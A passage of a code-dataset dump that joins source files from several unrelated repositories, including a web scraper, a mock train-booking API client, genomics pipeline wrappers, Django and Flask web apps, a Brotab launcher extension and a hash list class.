# Check whether the known valid inputs provide enough tokens to satisfy outputs:
insum_valid = sum(inp[2] for inp in inputs_info if inp[1] == 1)
if insum_valid >= myinfo:
return (True, 1)
return None
``` |
{
"source": "1cybersheep1/scrapie",
"score": 2
} |
#### File: scrapie/scrapie/feature.py
```python
class Feature:
def __init__(self, name, selector, data_type, number_of_values, patterns):
self.name = name
self.selector = selector
self.pattern = patterns[data_type]
self.multiple_values = number_of_values != 'single'
```
#### File: scrapie/scrapie/page.py
```python
import re
import requests
from bs4 import BeautifulSoup
def get_page_content(url, timeout=5):
try:
# Make the request
response = requests.get(url, stream=True,timeout=timeout)
# Check status code
if response.status_code != 200:
raise Exception(response.status_code)
return BeautifulSoup(response.content, "html.parser")
# If the request timed out print a warning
except requests.Timeout:
raise Exception('Timeout')
except:
raise Exception('Error')
def extract_features(page_content, features):
extracted_features = []
for feature in features:
tag_content = page_content.select(feature.selector)
text = tag_content[0].text if tag_content else ''
values = re.findall(feature.pattern, text)
extracted_features.append(', '.join(values) if feature.multiple_values else values[0])
return extracted_features
``` |
{
"source": "1d20/uz-api",
"score": 3
} |
#### File: uz-api/uz_api/client.py
```python
from uz_api import mock_data
from itertools import chain
from uz_api.models import Station, Train, Coach
from uz_api.serializers import Serializer
from uz_api.booking import BookingClient
class ClientInteface:
def __init__(self, language='en'):
self.client = BookingClient()
def stations(self, name):
stations = [Station.from_dict(station) for station in self.client.get_stations(name)]
return stations
def trains(self, station_from_id, station_to_id, date_dep, time_dep="00:00", time_dep_till=None,
another_ec=0, search=''):
"""
date_dep format: mm.dd.yyyy
"""
trains = [Train.from_dict(train) for train in mock_data.TRAINS['value']]
return trains
def coaches(self, station_from_id, station_to_id, date_dep, train, model, coach_type, round_trip=0, another_ec=0):
"""
date_dep: 1463224100
coach_type: С2
model: 3
train: 043
"""
coaches = [Coach.from_dict(train) for train in mock_data.COACHES['coaches']]
return coaches
def seats(self, station_from_id, station_to_id, date_dep, train, coach_num,
coach_class, coach_type_id, change_scheme):
return set(chain(*mock_data.COACH['value']['places'].values()))
if __name__ == '__main__':
client = ClientInteface()
print(client.stations('Ky'))
print(client.stations('Lv'))
# print(Serializer.serialize(client.stations('Ky')))
#
# print(client.trains(100, 42, '01.01.2000'))
# print(Serializer.serialize(client.trains(100, 42, '01.01.2000')))
#
# print(client.coaches(100, 42, 1463224100, '043', 3, 'C2'))
# print(Serializer.serialize(client.coaches(100, 42, 1463224100, '043', 3, 'C2')))
#
# print(client.seats(100, 42, 1463224100, '043', 1, 2, 19, 1))
``` |
{
"source": "1danielcoelho/SegmentationOptimizer",
"score": 3
} |
#### File: 1danielcoelho/SegmentationOptimizer/timeit_context.py
```python
from contextlib import contextmanager
import time
@contextmanager
def timeit_context(name):
"""
Use it to time a specific code snippet
Usage: 'with timeit_context('Testcase1'):'
:param name: Name of the context
"""
start_time = time.time()
yield
elapsed_time = time.time() - start_time
print('[{}] finished in {} ms'.format(name, int(elapsed_time * 1000)))
``` |
{
"source": "1danielcoelho/system-viewer",
"score": 2
} |
#### File: system-viewer/scripts/add_material_info.py
```python
from constants import *
from math import sin, cos, sqrt, atan2
from database_utils import save_database, load_database
materials = {
'199': 'rocky',
'299': 'atmo',
'399': 'earth',
'499': 'atmo',
'599': 'gas',
'699': 'gas',
'799': 'gas',
'899': 'gas',
'999': 'rocky',
}
material_parameters = {
'10': {
'base_color': 'FF9900FF',
'emissive_texture': '2k_sun.jpg',
'emissive_factor': '[1.0, 1.0, 1.0]',
},
'199': {
'base_color': '726658FF',
'base_color_texture': '2k_mercury.jpg'
},
'299': {
'base_color': 'EFECDDFF',
'base_color_texture': '2k_venus_atmosphere.jpg'
},
'301': {
'base_color': 'CFCFD1FF',
'base_color_texture': '2k_moon.jpg',
},
'399': {
'base_color': 'A49FB3FF',
'base_color_texture': '2k_earth_daymap.jpg',
'night_color_texture': '2k_earth_nightmap.jpg',
'normal_texture': '2k_earth_normal_map.png',
'metal_rough_texture': '2k_earth_metal_rough.png',
'clouds_texture': '2k_earth_clouds.jpg',
},
'499': {
'base_color': '896545FF',
'base_color_texture': '2k_mars.jpg'
},
'599': {
'base_color': 'C3BEABFF',
'base_color_texture': '2k_jupiter.jpg'
},
'699': {
'base_color': 'C9B38EFF',
'base_color_texture': '2k_saturn.jpg'
},
'799': {
'base_color': 'AED5DAFF',
'base_color_texture': '2k_uranus.jpg'
},
'899': {
'base_color': '91AFBAFF',
'base_color_texture': '2k_neptune.jpg'
},
'999': {
'base_color': 'C09F82FF',
},
}
# Hard-coded sun intensity in candela:
# https://what-if.xkcd.com/151/
light_intensities = {
'10': 3.024E27,
}
def add_light_info(database):
count = 0
for db_name, db in database.items():
if db_name in ['state_vectors', 'osc_elements']:
continue
for body_id, intensity in light_intensities.items():
try:
db[body_id]['brightness'] = intensity
print(f"added {intensity} as intensity to body {body_id}")
count += 1
except KeyError:
continue
return count
def add_material_info(database):
count = 0
for db_name, db in database.items():
if db_name in ['state_vectors', 'osc_elements']:
continue
for body_id, body in db.items():
# Material choice
set_mat = False
try:
mat = materials[body_id]
body['material'] = mat
except KeyError:
pass
# Material parameters
set_params = False
try:
params = material_parameters[body_id]
if 'material_params' not in body:
body['material_params'] = {}
body['material_params'].update(params)
set_params = True
except KeyError:
pass
if set_mat or set_params:
count += 1
return count
def run(database):
print("Adding material info to database bodies...")
count = add_material_info(database)
print(f"Added material info to {count} database bodies")
print("Adding light info to database bodies...")
count = add_light_info(database)
print(f"Added light info to {count} database bodies")
if __name__ == "__main__":
database = load_database()
run(database)
save_database(database)
```
#### File: system-viewer/scripts/database_utils.py
```python
import os
import sys
import json
import copy
import re
database_folder = "E:/Rust/system_viewer/public/database"
files = [
"asteroids",
"comets",
"jovian_satellites",
"saturnian_satellites",
"other_satellites",
"major_bodies",
"artificial",
"state_vectors",
"osc_elements",
]
def load_database():
""" Read existing files and load into maps """
database = {}
for file in files:
database[file] = {}
path = os.path.join(database_folder, file + ".json")
if os.path.exists(path):
with open(path, "r") as f:
database[file] = json.load(f)
return database
def get_body_by_name(database, name):
for base_name, base in database.items():
if base_name in ['state_vectors', 'osc_elements']:
continue
for body in base.values():
if body['name'] == name:
return body
return None
def save_database(database):
""" Write database back to their individual files """
# Sort all databases
for db_name in database.keys():
database[db_name] = {k: v for k, v in sorted(database[db_name].items(), key=lambda item: item)}
# Write database to files
for filename in database:
path = os.path.join(database_folder, filename + ".json")
with open(path, "w") as f:
json.dump(database[filename], f)
``` |
{
"source": "1davidmichael/iam_generator",
"score": 2
} |
#### File: iam_generator/src/html.py
```python
from fastapi import FastAPI, Request, Form
from fastapi.templating import Jinja2Templates
from src.model import generate_iam_policy
app = FastAPI()
templates = Jinja2Templates(directory="templates/")
@app.get("/")
def form_post(request: Request):
result = "Type a ARN"
return templates.TemplateResponse('form.html', context={'request': request, 'result': result})
@app.post("/")
def form_post(request: Request, arn: str = Form(...), type: str = Form(...)):
result = generate_iam_policy(arn, type)
return templates.TemplateResponse('form.html', context={'request': request, 'result': result})
``` |
{
"source": "1davidmichael/lambda-uncompressed-size-reviewer",
"score": 2
} |
#### File: 1davidmichael/lambda-uncompressed-size-reviewer/total_lambda_size.py
```python
import boto3
import botostubs
import glob
import os
import requests
import sys
import shutil
import tempfile
import zipfile
from hurry.filesize import size
def get_size_total(temp_dir):
zip_files = glob.glob(os.path.join(temp_dir, "*.zip"))
all_size = 0
for zip in zip_files:
total_size = 0
zip_file = zipfile.ZipFile(zip)
for file in zip_file.namelist():
total_size += zip_file.getinfo(name=file).file_size
all_size += total_size
human_size = size(total_size)
print(f"{ zip }: { human_size }")
print(f"Total: { size(all_size) }")
def main(lambda_name):
temp_dir = tempfile.mkdtemp()
client = boto3.client("lambda", region_name="us-east-1") # type: botostubs.LAMBDA
lambda_info = client.get_function(
FunctionName=lambda_name
)
response = requests.get(lambda_info["Code"]["Location"])
with open(os.path.join(temp_dir, f"{ lambda_name }.zip"), "wb") as f:
f.write(response.content)
for layer in lambda_info["Configuration"]["Layers"]:
layer_arn = layer["Arn"].split(":")
layer_name = layer_arn[6]
layer_version = layer_arn[7]
layer_info = client.get_layer_version(
LayerName=layer_name,
VersionNumber=int(layer_version)
)
response = requests.get(layer_info["Content"]["Location"])
with open(os.path.join(temp_dir, f"{ layer_name }.zip"), "wb") as f:
f.write(response.content)
get_size_total(temp_dir)
shutil.rmtree(temp_dir)
if __name__ == "__main__":
lambda_name = sys.argv[1]
main(lambda_name=lambda_name)
``` |
{
"source": "1dayac/LRSIM",
"score": 3
} |
#### File: scripts/galaxy/dwgsim_eval_wrapper.py
```python
import optparse, os, shutil, subprocess, sys, tempfile
def stop_err( msg ):
sys.stderr.write( '%s\n' % msg )
sys.exit()
def run_process ( cmd, name, tmp_dir, buffsize ):
try:
tmp = tempfile.NamedTemporaryFile( dir=tmp_dir ).name
tmp_stderr = open( tmp, 'wb' )
proc = subprocess.Popen( args=cmd, shell=True, cwd=tmp_dir, stderr=tmp_stderr.fileno() )
returncode = proc.wait()
tmp_stderr.close()
# get stderr, allowing for case where it's very large
tmp_stderr = open( tmp, 'rb' )
stderr = ''
try:
while True:
stderr += tmp_stderr.read( buffsize )
if not stderr or len( stderr ) % buffsize != 0:
break
except OverflowError:
pass
tmp_stderr.close()
if returncode != 0:
raise Exception, stderr
except Exception, e:
raise Exception, 'Error in \'' + name + '\'. \n' + str( e )
def check_output ( output, canBeEmpty ):
if 0 < os.path.getsize( output ):
return True
elif False == canBeEmpty:
raise Exception, 'The output file is empty:' + output
def __main__():
#Parse Command Line
parser = optparse.OptionParser()
parser.add_option( '-a', '--alignmentScore', action='store_true', dest='alignmentScore', default=False, help='split alignments by alignment score instead of mapping quality' )
parser.add_option( '-b', '--bwa', action='store_true', dest='bwa', default=False, help='alignments are from BWA (SOLiD only)' )
parser.add_option( '-c', '--colorSpace', action='store_true', dest='colorSpace', default=False, help='generate reads in color space (SOLiD reads)' )
parser.add_option( '-d', '--scoreFactor', dest='scoreFactor', type='int', help='divide quality/alignment score by this factor' )
parser.add_option( '-g', '--wiggle', dest='wiggle', type='int', help='gap "wiggle"' )
parser.add_option( '-n', '--numReads', dest='numReads', type='int', help='number of raw input paired-end reads (otherwise, inferred from all SAM records present).' )
parser.add_option( '-q', '--minMapq', dest='minMapq', type='int', help='consider only alignments with this mapping quality or greater.' )
parser.add_option( '-z', '--singleEnd', action='store_true', dest='singleEnd', default=False, help='input contains only single end reads' )
parser.add_option( '-S', '--sam', dest='sam', default=None, help='input SAM' )
parser.add_option( '-B', '--bam', dest='bam', default=None, help='input BAM' )
parser.add_option( '-p', '--printIncorrect', action='store_true', dest='printIncorrect', default=False, help='print incorrect alignments' )
parser.add_option( '-s', '--numSnps', dest='numSnps', type="int", help='consider only alignments with the number of specified SNPs' )
parser.add_option( '-e', '--numErrors', dest='numErrors', type="int", default=False, help='consider only alignments with the number of specified errors' )
parser.add_option( '-i', '--indels', action='store_true', dest='indels', default=False, help='consider only alignments with indels' )
parser.add_option( '-o', '--output', dest='output', help='The file to save the output' )
(options, args) = parser.parse_args()
# output version # of tool
try:
tmp = tempfile.NamedTemporaryFile().name
tmp_stdout = open( tmp, 'wb' )
proc = subprocess.Popen( args='dwgsim_eval 2>&1', shell=True, stdout=tmp_stdout )
tmp_stdout.close()
returncode = proc.wait()
stdout = None
for line in open( tmp_stdout.name, 'rb' ):
if line.lower().find( 'version' ) >= 0:
stdout = line.strip()
break
if stdout:
sys.stdout.write( '%s\n' % stdout )
else:
raise Exception
except:
sys.stdout.write( 'Could not determine DWGSIM_EVAL version\n' )
buffsize = 1048576
# make temp directory for dwgsim, requires trailing slash
tmp_dir = '%s/' % tempfile.mkdtemp()
#'generic' options used in all dwgsim commands here
try:
tmp_dir = '%s/' % tempfile.mkdtemp()
dwgsim_eval_cmd = 'dwgsim_eval'
if True == options.alignmentScore:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -a'
if True == options.bwa:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -b'
if True == options.colorSpace:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -c'
use_p = False
if 0 <= options.numSnps:
use_p = True
dwgsim_eval_cmd = dwgsim_eval_cmd + (' -s %s' % options.numSnps)
if 0 <= options.numErrors:
use_p = True
dwgsim_eval_cmd = dwgsim_eval_cmd + (' -e %s' % options.numErrors)
if True == options.indels:
use_p = True
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -i'
if True == use_p or True == options.printIncorrect:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -p'
if True == options.singleEnd:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -z'
dwgsim_eval_cmd = '%s -d %s -g %s -n %s -q %s' % (dwgsim_eval_cmd, \
options.scoreFactor, \
options.wiggle, \
options.numReads, \
options.minMapq)
if None != options.sam:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -S ' + options.sam
elif None != options.bam:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' ' + options.bam
else:
raise Exception, 'Input file was neither a SAM nor BAM'
dwgsim_eval_cmd = dwgsim_eval_cmd + ' > ' + options.output
# need to nest try-except in try-finally to handle 2.4
try:
# dwgsim
run_process ( dwgsim_eval_cmd, 'dwgsim', tmp_dir, buffsize )
# check that there are results in the output file
check_output ( options.output, False )
sys.stdout.write( 'DWGSIM_EVAL successful' )
except Exception, e:
stop_err( 'DWGSIM_EVAL failed.\n' + str( e ) )
finally:
# clean up temp dir
if os.path.exists( tmp_dir ):
shutil.rmtree( tmp_dir )
if __name__=="__main__": __main__()
``` |
{
"source": "1dayac/novel_insertions",
"score": 2
} |
#### File: 1dayac/novel_insertions/novel-x.py
```python
import click
from click_option_group import optgroup, MutuallyExclusiveOptionGroup
import pysam
import json
from os import mkdir, path, symlink, chdir
from shutil import copy2
from subprocess import call, Popen
def get_read_group(bam):
readgroup = ""
bamfile = pysam.AlignmentFile(bam, "rb")
for read in bamfile.fetch(until_eof=True):
try:
readgroup = read.get_tag('RG')
break
except:
pass
bamfile.close()
return readgroup.replace(":", "_")[:-2]
def create_config(bam, genome, nt, outdir, lr20, m, t, highcoverage, lowcoverage, tenx):
data = {}
data['genome'] = path.abspath(genome)
data['additional_flags'] = "--lr20" if lr20 else ""
data['blast_db'] = nt + "/nt" if nt != "" else "None"
data['root'] = path.dirname(path.realpath(__file__))
data['sample'] = path.basename(bam)[:-4]
data['outdir'] = outdir
data['threads'] = int(t)
data['memory'] = int(m)
data['memory_per_thread'] = int(m/(2*t)) + 1
data['velvet_coverage'] = 8 if highcoverage else 2
data['velvet_k_assembly'] = 63 if tenx else 49
data['spades_k_assembly'] = 77 if tenx else 49
data['tenx'] = "10X" if tenx else "other"
with open(outdir + "/config.json", 'w') as configfile:
json.dump(data, configfile, sort_keys=True, indent=4)
@click.group()
def main():
pass
@main.command()
@click.option('--outdir', nargs = 1, required = True)
def restart(outdir):
"""Restart unfinished 10X-pipeline for novel insertion detection."""
chdir(outdir)
process = Popen(['snakemake', '--unlock', '--cores', 'all'])
process.wait()
process = Popen(['snakemake', '--cores', 'all'])
process.wait()
@main.command()
@click.option('--bam', help = "No options defined but a name was passed", required = True)
@click.option('--genome', help = "Genome file in fasta or fasta.gz format", required = True)
@click.option('--nt', default = "", nargs = 1, help = 'Folder containing NT database. '
'If not provided filtering of non-human sequences is not performed')
@click.option('--outdir', nargs = 1, required = True)
@click.option('--lr20', default=False, is_flag = True, help = 'If your BAM-file was produced by LongRanger 2.0 you should provide '
'this option to avoid failures')
@click.option('-m', default = 100, nargs = 1, help = 'Available memory specified in gygabytes')
@click.option('-t', default = 8, nargs = 1, help = 'Number of threads')
@optgroup.group('Coverage option group', cls=MutuallyExclusiveOptionGroup)
@optgroup.option('--high-coverage', 'highcoverage', is_flag=True, default=True, help = "Flag for high-coverage data (60X or higher, default)")
@optgroup.option('--low-coverage', 'lowcoverage', is_flag = True, default = False, help = "Flag for low-coverage data (20-40X)")
@optgroup.group('Data type option group', cls=MutuallyExclusiveOptionGroup)
@optgroup.option('--10x', 'tenx', is_flag=True, default=True, help = "Default")
@optgroup.option('--stlfr', is_flag = True, default = False)
@optgroup.option('--tellseq', is_flag = True, default = False)
def run(bam, genome, nt, outdir, lr20, m, t, highcoverage, lowcoverage, tenx, stlfr, tellseq):
"""Run 10X-pipeline for novel insertion detection."""
try:
mkdir(outdir)
except:
print("Output folder can't be created. Probably it already exists")
return -1
if stlfr or tellseq:
tenx = False
if lowcoverage:
highcoverage = False
create_config(bam, genome, nt, outdir, lr20, m, t, highcoverage, lowcoverage, tenx)
copy2(path.dirname(path.realpath(__file__)) + "/path_to_executables_config.json", outdir)
copy2(path.dirname(path.realpath(__file__)) + "/Snakefile", outdir)
mkdir(outdir + "/sample")
symlink(path.abspath(bam), outdir + "/sample/" + path.basename(bam))
chdir(outdir)
process = Popen(['snakemake', '--cores', str(t)])
process.wait()
if __name__ == '__main__':
main()
```
#### File: 1dayac/novel_insertions/remove_contaminations.py
```python
import sys
import re
import math
import os
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def usage():
print("\nUsage: python extractContaminants.py contaminationFile orphan.fq.contigs.fa orphan.fq.contigs.wocontamination.fa")
sys.exit(-1)
def main():
args = sys.argv[1:]
if len(args) != 3:
usage()
fcontamination = open(sys.argv[1], 'r')
fcontig = open(sys.argv[2], 'r')
fout = open(sys.argv[3], 'w')
contamination = fcontamination.readline()
while contamination != '':
contamination = contamination.split()[0]
contig = fcontig.readline()[:-1]
if (contig != ''):
contig = re.split(">| ", contig)[1]
while contamination != contig and contig != '':
fout.write(">" + contig + "\n")
while True:
temp_string = fcontig.readline()
if temp_string != '' and temp_string[0] != '>':
fout.write(temp_string)
else:
break
contig = temp_string
if (contig != ''):
contig = re.split(">| ", contig)[1][:-1]
if (contamination == contig and contig != ''):
last_pos = fcontig.tell()
fcontig.readline()
while contig != '':
if contig[0] == '>':
fcontig.seek(last_pos)
break
last_pos = fcontig.tell()
contig = fcontig.readline()
contamination = fcontamination.readline()
contig = fcontig.readline()
while contig != '':
fout.write(contig)
fout.write(fcontig.readline())
contig = fcontig.readline()
fout.close()
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "1debit/infosec-trust-stores-observatory",
"score": 3
} |
#### File: trust_stores_observatory/store_fetcher/microsoft_fetcher.py
```python
from datetime import datetime
from typing import Tuple, List
from urllib.request import urlopen
from cryptography.hazmat.primitives import hashes
from trust_stores_observatory.certificates_repository import RootCertificatesRepository
from trust_stores_observatory.store_fetcher.root_records_validator import RootRecordsValidator
from trust_stores_observatory.store_fetcher.scraped_root_record import ScrapedRootCertificateRecord
from trust_stores_observatory.store_fetcher.store_fetcher_interface import StoreFetcherInterface
from trust_stores_observatory.trust_store import TrustStore, PlatformEnum
class MicrosoftTrustStoreFetcher(StoreFetcherInterface):
"""Fetch the content of the MSFT / Windows trust store.
This fetcher uses the newly-available CCADB described at
https://docs.microsoft.com/en-us/security/trusted-root/participants-list.
"""
_CSV_URL = "https://ccadb-public.secure.force.com/microsoft/IncludedCACertificateReportForMSFTCSV"
_PAGE_URL = "https://ccadb-public.secure.force.com/microsoft/IncludedCACertificateReportForMSFT"
def fetch(self, certs_repo: RootCertificatesRepository, should_update_repo: bool = True) -> TrustStore:
with urlopen(self._CSV_URL) as response:
csv_content = response.read().decode("utf-8")
# Extract the data from the CSV
scraped_trusted_root_records, scraped_blocked_root_records = self._parse_spreadsheet(csv_content)
# Look for each parsed certificate in the supplied certs repo
trusted_root_records = RootRecordsValidator.validate_with_repository(certs_repo, scraped_trusted_root_records)
blocked_root_records = RootRecordsValidator.validate_with_repository(certs_repo, scraped_blocked_root_records)
date_fetched = datetime.utcnow().date()
return TrustStore(
PlatformEnum.MICROSOFT_WINDOWS,
None,
self._PAGE_URL,
date_fetched,
trusted_root_records,
blocked_root_records,
)
@staticmethod
def _parse_spreadsheet(
csv_content: str
) -> Tuple[List[ScrapedRootCertificateRecord], List[ScrapedRootCertificateRecord]]:
# Iterate over each row in the work sheet
parsed_trusted_root_records = []
parsed_blocked_root_records = []
for csv_row in csv_content.splitlines()[1::]:
split_row = csv_row.split('","')
subject_name = split_row[1].strip()
if subject_name is None:
# Most likely indicates the end of the data
continue
is_cert_trusted = False
status = split_row[9].strip()
if "Included" in status:
# Some certs are disabled or have a notBefore constraint
is_cert_trusted = True
sha256_fingerprint = split_row[3].strip()
fingerprint = bytes(bytearray.fromhex(sha256_fingerprint))
record = ScrapedRootCertificateRecord(subject_name, fingerprint, hashes.SHA256())
if is_cert_trusted:
parsed_trusted_root_records.append(record)
else:
parsed_blocked_root_records.append(record)
return parsed_trusted_root_records, parsed_blocked_root_records
``` |
{
"source": "1dom/ulauncher-brotab",
"score": 2
} |
#### File: ulauncher-brotab/brotab_ulauncher/client.py
```python
import subprocess
import logging
from brotab_ulauncher.brotab import return_clients, return_tabs, activate_tab, close_tab
from asyncio import new_event_loop, set_event_loop
from memoization import cached
logger = logging.getLogger(__name__)
class BrotabClient:
""" Client to interact with Brotab Command line tool """
clients = {}
def __init__(self):
""" Constructor method """
pass
@cached(ttl=15)
def is_installed(self):
""" Checks if Brotab is installed """
result = subprocess.run(['which', 'brotab'])
if result.returncode == 0:
return True
return False
def index_clients(self):
""" Index the clients connected """
self.clients = {}
clients = return_clients()
for client in clients:
self.clients[client.__dict__["_prefix"].replace(".", "")] = client.__dict__["_browser"]
@cached(ttl=5)
def fetch_tabs(self):
""" Index Tabs list """
logger.info("Fetching tabs")
self.index_clients()
loop = new_event_loop()
set_event_loop(loop)
tabs_listed = return_tabs()
tabs = []
for tab in tabs_listed:
tab = tab.split("\t")
tabs.append({
"prefix": tab[0],
"name": tab[1],
"url": tab[2],
"icon": self.get_browser_icon_from_prefix(tab[0][:1])
})
return tabs
def search_tabs(self, filter_term=None):
""" Returns a list of tabs, optionally filtered by the filter_query parameter """
allTabs = self.fetch_tabs()
if not filter_term:
return allTabs
tabs = []
for tab in allTabs:
if filter_term.lower() in tab["name"].lower() or filter_term.lower() in tab["url"].lower():
tabs.append(tab)
return tabs
def activate_tab(self, prefix):
""" Activates the tab with the specified prefix """
activate_tab(prefix)
def close_tab(self, prefix):
""" Closes the tab with the specified prefix """
close_tab(prefix)
def get_browser_icon_from_prefix(self, prefix):
""" Returns the name of the icon to display as client """
if prefix not in self.clients.keys():
return 'icon.png'
client = self.clients.get(prefix)
if "chrome" in client:
return 'icon-chrome.png'
if "firefox" in client:
return "icon-firefox.png"
if "brave" in client:
return "icon-brave.png"
return "icon.png"
```
#### File: ulauncher-brotab/brotab_ulauncher/listeners.py
```python
from ulauncher.api.client.EventListener import EventListener
class KeywordQueryEventListener(EventListener):
""" Listener that handles the user input """
def on_event(self, event, extension):
""" Handles the event """
keyword = event.get_keyword() or ""
valid_keywords = ["cltab", "cl", "clt"]
if keyword in valid_keywords:
extension.mode = "killer"
else:
extension.mode = "activator"
return extension.search_tabs(event)
class ItemEnterEventListener(EventListener):
""" Listener that handles the click on an item """
# pylint: disable=unused-argument,no-self-use
def on_event(self, event, extension):
""" Handles the event """
data = event.get_data()
if data["mode"] == "activator":
extension.brotab_client.activate_tab(data["tab"])
if data["mode"] == "killer":
try:
extension.brotab_client.close_tab(data["tab"])
except Exception as error:
extension.logger.error(error)
extension.logger.info("Tab closed")
``` |
{
"source": "1donggri/teamProject",
"score": 2
} |
#### File: teamProject/board/forms.py
```python
from django.contrib.auth.hashers import check_password
from django import forms
from .models import Board
class BoardForm(forms.Form):
class Meta:
model = Board
fields = ['name', 'title', 'file']
# 입력받을 값 두개
name = forms.CharField(error_messages={'required': '작성자를 입력하세요.'}, max_length=100, label="작성자")
title = forms.CharField(error_messages={'required': '제목을 입력하세요.'}, max_length=100, label="제목")
file = forms.FileField(error_messages={'required': '파일을 업로드하세요.'}, label="파일")
def __init__(self, *args, **kwargs):
super(BoardForm, self).__init__(*args, **kwargs)
# self.fields['file'].required = False
```
#### File: teamProject/board/models.py
```python
from django.db import models
# Create your models here.
class Board(models.Model):
author = models.CharField(max_length=100, null=False, verbose_name="작성자")
title = models.CharField(max_length=100, null=False)
created_date = models.DateTimeField(auto_now_add=True, verbose_name="작성일")
modified_date = models.DateTimeField(auto_now=True, verbose_name="최종수정일")
file = models.FileField(null=True, upload_to="")
def __str__(self):
return self.title
class Meta:
db_table = 'boards'
verbose_name = '게시판'
verbose_name_plural = '게시판'
```
#### File: teamProject/schedule/views.py
```python
from django.shortcuts import render, redirect
from .models import Post
from .forms import ScheduleForm
from django.core.paginator import Paginator
# Create your views here.
def view_schedule(request):
all_posts = Post.objects.all().order_by('pub_date')
page = int(request.GET.get('p', 1))
pagenator = Paginator(all_posts, 5)
posts = pagenator.get_page(page)
return render(request, 'schedule/view_schedule.html', {'posts': posts})
def write_schedule(request):
if request.method == "POST":
form = ScheduleForm(request.POST)
if form.is_valid():
# form의 모든 validators 호출 유효성 검증 수행
# user_id = request.session.get('user')
# user = User.objects.get(pk=user_id)
schedule = Post()
schedule.title = form.cleaned_data['title']
# # 검증에 성공한 값들은 사전타입으로 제공 (form.cleaned_data)
# # 검증에 실패시 form.error 에 오류 정보를 저장
schedule.username = form.cleaned_data['username']
schedule.pub_date = form.cleaned_data['pub_date']
schedule.save()
return redirect('schedule:view_schedule')
else:
form = ScheduleForm()
return render(request, 'schedule/write_schedule.html', {'form': form})
def delete(request, posts_id):
post = Post.objects.get(id=posts_id)
post.delete()
posts = Post.objects.all().order_by('-id')
return render(request, 'schedule/view_schedule.html', {'posts': posts})
``` |
{
"source": "1Doomdie1/hashlist",
"score": 4
} |
#### File: src/hashlist/hash_list.py
```python
class hash_list():
def __init__(self):
self.hash_list = {}
def add(self, *args):
if args:
for item in args:
key = self._key(item)
if self.hash_list.get(key):
self.hash_list[key].append(item)
else:
self.hash_list[key] = [item]
else:
raise TypeError('No arguments passed.')
def get_item_index(self, item):
key = self._key(item)
if self.hash_list.get(key):
items_lst = self.hash_list[key]
if item in items_lst:
return (key, items_lst.index(item))
raise LookupError(f"'{item}' may have the same key but is not in hashlist")
else:
raise LookupError(f"'{item}' not found")
def get_item_by_index(self, index):
try:
return self.hash_list[index[0]][index[1]]
except LookupError:
raise LookupError('Index out of bound')
def remove_item_by_index(self, index):
try:
self.hash_list[index[0]].pop(index[1])
if self.hash_list[index[0]]:
self.delete_key(index[0])
except LookupError:
raise LookupError('Index out of bound.')
def remove_item_by_name(self, item):
index = self.get_item_index(item)
self.remove_item_by_index(index)
def delete_key(self, key):
self.hash_list.pop(key)
def keys(self):
ind = [index for index in self.hash_list.keys()]
return ind
def _key(self, word):
if word:
key = sum([ord(letter) for letter in word])//len(word)
return key
raise TypeError('Argument can not be None')
def print(self):
print(self.hash_list)
``` |
{
"source": "1Doomdie1/ivy",
"score": 3
} |
#### File: automation_tools/pr_automation/pr_action.py
```python
import sys
import json
from process_pr import Process_pr
def import_file(file_path):
with open(file_path, 'r') as file:
data = json.loads(file.read())
return data
def main():
pr = Process_pr(int(sys.argv[1]), sys.argv[2])
interns_assigned_volunteers = import_file('volunteer_go_to_intern.json')
interns = list(interns_assigned_volunteers.keys())
for ivy_intern, assigned_volunteers in interns_assigned_volunteers.items():
if pr.author() in assigned_volunteers:
pr.assign_intern(ivy_intern)
print(f'[+] {ivy_intern} was assigned to PR {pr.number()}')
sys.exit(0)
pr.assign_random_intern(interns)
if __name__ == '__main__':
main()
``` |
{
"source": "1dot75cm/flasky",
"score": 2
} |
#### File: app/api_1_0/chrome.py
```python
import time
from flask import jsonify, request, abort
from ..models import Chrome
from .. import cache
from . import api
@api.route('/chrome')
@cache.memoize(timeout=600)
def get_chrome():
'''获取chrome版本'''
platform = ['win', 'mac', 'linux']
archs = ['x86', 'x64']
channels = ['stable', 'beta', 'dev', 'canary']
cache = request.args.get('cache', False)
if cache in ['0', 'false']:
cache = False
system = request.args.get('os', platform)
arch = request.args.get('arch', archs)
channel = request.args.get('channel', channels)
system = [system] if type(system) == unicode else system
arch = [arch] if type(arch) == unicode else arch
channel = [channel] if type(channel) == unicode else channel
if system[0] in platform and arch[0] in archs and channel[0] in channels:
pkgs, cache = Chrome.check_update(system, channel, arch, cache)
pkglist = []
for pkg in pkgs:
pkglist.append(dict(
name=pkg.name,
version=pkg.version,
os=pkg.os,
arch=pkg.arch,
channel=pkg.channel,
size=pkg.size,
sha256=pkg.hash,
urls=pkg.urls.split(','),
timestamp=time.mktime(pkg.timestamp.timetuple())))
return jsonify({'results': pkglist, 'cache': cache})
else:
abort(404)
```
#### File: app/api_1_0/comments.py
```python
from flask import jsonify, request, g, url_for
from .. import db, cache
from ..models import Post, Permission, Comment
from ..schemas import comment_schema, comments_schema
from . import api
from .decorators import permission_required
from .utils import get_data
@api.route('/comments/')
@cache.memoize(timeout=600)
def get_comments():
'''获取评论列表'''
query = Comment.query.order_by(Comment.timestamp.desc())
items, prev, next, total = get_data(
query, comments_schema, 'api.get_comments', type='comment')
return jsonify({
'self': items.data,
'prev': prev,
'next': next,
'count': total
})
@api.route('/comments/<int:id>')
@cache.memoize(timeout=600)
def get_comment(id):
'''获取评论'''
comment = Comment.query.get_or_404(id)
return comment_schema.jsonify(comment)
@api.route('/posts/<int:id>/comments/')
@cache.memoize(timeout=600)
def get_post_comments(id):
'''获取文章的评论列表'''
post = Post.query.get_or_404(id)
query = post.comments.order_by(Comment.timestamp.asc())
items, prev, next, total = get_data(
query, comments_schema, 'api.get_post_comments', type='comment')
return jsonify({
'self': items.data,
'prev': prev,
'next': next,
'count': total
})
@api.route('/posts/<int:id>/comments/', methods=['POST'])
@permission_required(Permission.COMMENT)
def new_post_comment(id):
'''为文章撰写新评论'''
post = Post.query.get_or_404(id)
json_data = request.get_json()
if not json_data:
